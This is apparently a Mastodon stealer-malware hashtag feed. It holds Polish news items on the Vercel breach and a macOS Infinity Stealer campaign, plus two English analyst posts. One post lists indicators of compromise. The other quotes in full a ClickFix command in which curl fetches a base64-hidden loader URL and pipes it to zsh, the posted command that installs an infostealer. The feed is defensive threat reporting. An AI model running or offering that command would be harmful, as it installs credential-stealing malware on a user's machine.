Mastodawn

Zhackowali ich, bo pracownik SaaS z którego korzystali pobrał cheaty do gier. Czyli dlaczego trzeba uważać na OAuth!

Jaka piękna katastrofa! W tej historii jest wszystko: infekcja nie jednego, a dwóch niezbyt roztropnych pracowników różnych “technicznych” firm. Przeskok z jednej zainfekowanej infrastrukry na drugą, bo żadna z firm nie korzystała z zasady minimalnych przywilejów a można odnieść wrażenie, że w ogóle z żadnych mechanizmów bezpieczeństwa. I wreszcie grupa atakujących, która kradnie tożsamość innej grupie oraz plujący jadem internetowi przeciwnicy vibecodingu, którzy z widłami poszli na firmę, bo przecież wiadomo, że “każdy programista AI to debil”. A okazało się, że AI nie miało z tym atakiem niczego wspólnego.
Od czego się zaczęło?
19 kwietnia na znanym hackerskim forum pojawiła się informacja o tym, że popularna wśród vibecoderów platforma Vercel została zhackowana. Atakujący podpisujący się jako ShinyHunters wystawili na sprzedaż klucze i dostępy do bazy danych firmy. Zrobiło się gorąco w środowisku, bo Vercel stoi też za narzędziem v0 oraz popularną biblioteką Next.js, a to od razu przywołało ostatnie głośne ataki supply chain.

Na początku oczywiście spekulowano, że przełamanie zabezpieczeń to wynik użycia beztroskiego vibecodingu do budowy i konfiguracji mechanizmów bezpieczeństwa Vercela. Bo firma z vibecodingiem jest kojarzona. Ale prawda okazała jeszcze bardziej bolesna. Źródłem ataku był łańcuch dwóch pracowników.

Pierwszy to pracownik zewnętrznej firmy — Contex.ai, który pobierał …cheaty do gry Roblox zainfekowane infostealerem Lumma. Dzięki temu atakujący mieli dostęp do infrastruktury firmy Contex.ai oraz danych jej klientów. Dwa miesiące [...]

#AI #EskalacjaPrzywilejów #GoogleWorkspace #Infostealer #Malware #SaaS #Stealer #Vercel

https://niebezpiecznik.pl/post/zhackowali-ich-bo-pracownik-saas-z-ktorego-korzystali-pobral-cheaty-do-gier-czyli-dlaczego-trzeba-uwazac-na-oauth/

Zhackowali ich, bo pracownik SaaS z którego korzystali pobrał cheaty do gier. Czyli dlaczego trzeba uważać na OAuth!

NieBezpiecznik.pl

James_inthe_box Apr 17

#unknown #stealer:

https://app.any.run/tasks/0a652cd4-ff40-453c-8204-68e379c25ea4

13 Apr 7

Infiniti Stealer – nowe zagrożenie dla użytkowników macOS. Wszystko zaczyna się od złośliwej CAPTCHA i jednego polecenia w terminalu https://sekurak.pl/infiniti-stealer-nowe-zagrozenie-dla-uzytkownikow-macos-wszystko-zaczyna-sie-od-zlosliwej-captcha-i-jednego-polecenia-w-terminalu/ #Wbiegu #CAPTCHA #Inifiniti #Macos #Malware #Stealer

Infiniti Stealer – nowe zagrożenie dla użytkowników macOS. Wszystko zaczyna się od złośliwej CAPTCHA i jednego polecenia w terminalu

Badacze bezpieczeństwa z Malwarebytes ostrzegają posiadaczy Maców przed szeroko zakrojoną kampanią malware. Cyberprzestępcy za pomocą phishingu nakłaniają użytkowników do instalacji złośliwego oprogramowania typu infostealer (Infiniti Stealer). Atak opiera się na technice ClickFix, polegającej na przekonaniu użytkownika do uruchomienia złośliwych poleceń PowerShell, pod pozorem naprawy krytycznych błędów systemowych. TLDR: Atak sam...

Sekurak

sekurak News Apr 7

Infiniti Stealer – nowe zagrożenie dla użytkowników macOS. Wszystko zaczyna się od złośliwej CAPTCHA i jednego polecenia w terminalu

Badacze bezpieczeństwa z Malwarebytes ostrzegają posiadaczy Maców przed szeroko zakrojoną kampanią malware. Cyberprzestępcy za pomocą phishingu nakłaniają użytkowników do instalacji złośliwego oprogramowania typu infostealer (Infiniti Stealer). Atak opiera się na technice ClickFix, polegającej na przekonaniu użytkownika do uruchomienia złośliwych poleceń PowerShell, pod pozorem naprawy krytycznych błędów systemowych. TLDR: Atak sam...

#WBiegu #CAPTCHA #Inifiniti #Macos #Malware #Stealer

https://sekurak.pl/infiniti-stealer-nowe-zagrozenie-dla-uzytkownikow-macos-wszystko-zaczyna-sie-od-zlosliwej-captcha-i-jednego-polecenia-w-terminalu/

Infiniti Stealer – nowe zagrożenie dla użytkowników macOS. Wszystko zaczyna się od złośliwej CAPTCHA i jednego polecenia w terminalu

Badacze bezpieczeństwa z Malwarebytes ostrzegają posiadaczy Maców przed szeroko zakrojoną kampanią malware. Cyberprzestępcy za pomocą phishingu nakłaniają użytkowników do instalacji złośliwego oprogramowania typu infostealer (Infiniti Stealer). Atak opiera się na technice ClickFix, polegającej na przekonaniu użytkownika do uruchomienia złośliwych poleceń PowerShell, pod pozorem naprawy krytycznych błędów systemowych. TLDR: Atak sam...

Sekurak

Gi7w0rm Mar 30

New tool for all those #Stealer #malware analysts out there:
https://crxray[.]info
Translate #Chrome #Extension IDs to their Names and Descriptions in Bulk.
Currently 174,534 Extensions in database. More related tools to come.

securityaffairs Mar 30

New #macOS #Infinity #Stealer uses Nuitka Python payload and #ClickFix
https://securityaffairs.com/190147/security/new-macos-infinity-stealer-uses-nuitka-python-payload-and-clickfix.html
#securityaffairs #hacking #malware

New macOS Infinity Stealer uses Nuitka Python payload and ClickFix

Infinity Stealer targets macOS via fake Cloudflare CAPTCHA, using Nuitka; first such campaign per Malwarebytes.

Security Affairs

Show thread

Joseph Mar 26

A more sane and parseable list of indicators:

Landing page

httpX://macdev.slab[.]com/public/posts/insta-іі-with-termina-і-g40n4aau?shr=6etwxr0gksp2ltctcqv7gom7

Loaders

httpX://datasphere.us[.]com/debug/loader.sh?build=492f9e58358e8e2bc9e0414fa077e197
https://datasphere.us.com/debug/payload.applescript?build=492f9e58358e8e2bc9e0414fa077e197

Mocked User Agent for curls

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36

APIs

httpX://datasphere.us[.]com/api/debug/event     # initial info gathering 
httpX://datasphere.us[.]com/gate                         # stealer upload location 
httpX://datasphere.us[.]com/gate/chunk              # large file uploads 
httpX://datasphere.us[.]com/api/bot/heartbeat   # Persistence heartbeat API

api key 61cb9c3bd1a2faa7d6613dd8e5d09e79fe95e85ab09ed6bcd6406badff5a083f

#osx #stealer #iocs

Joseph Mar 26

Absolute state of google, (and frankly the expectations of developers for installing things).

Setting up an older Mac to use as a new work machine, search google for brew Mac looking for the brew.sh site, first result is a sponsored link to httpX://macdev.slab[.]com/public/posts/insta-іі-with-termina-і-g40n4aau?shr=6etwxr0gksp2ltctcqv7gom7. I know it's not right but I got curious, let's see what's inside.

First link is familiar install instructions as we're used to for brew "here copy paste this code into terminal, don't ask questions". * Don't actually do this *

echo "Downloading Update: https://support.apple.com/downloads/xprotect-remediator-150.dmg" && curl -s $(echo "aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=" | base64 -d) | zsh

Aww man that base64 makes me feel good and trusting, wonder what's inside

echo 'aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=' | base64 -d | cat

httpX://datasphere.us[.]com/debug/loader.sh?build=492f9e58358e8e2bc9e0414fa077e197

hrmm, that's not brew, oh well maybe this is fine, let's check it out with urlscan, looks like me and 5 of my closest friends have had the same idea
https://urlscan.io/result/019d298d-3b24-7571-a37a-12575ae1eb84/

Another base64 blob, that truly gives me the warm and fuzzies, I'm starting to think maybe it's not brew https://pastebin.com/5cr5Nh1W
VirusTotal thinks this new blob might be a stealer https://www.virustotal.com/gui/file/54043cd8874e0eabbced73e433cfa30c75fd45364ae4f03fbda2eabca9d8d994?nocache=1

This blob grabs some basic info then pulls an osa script which appears to be the friends we made along the way (stealer)
https://www.virustotal.com/gui/file/f02758a235a220f2fa125bb6f45a49e674fd8b91f320a382e8b7017d93afbc74

Pastebin doesn't like the script so won't upload it there, can reach out if a copy is needed, but seems to be pretty well indexed

#osx #malware #stealer #google #brew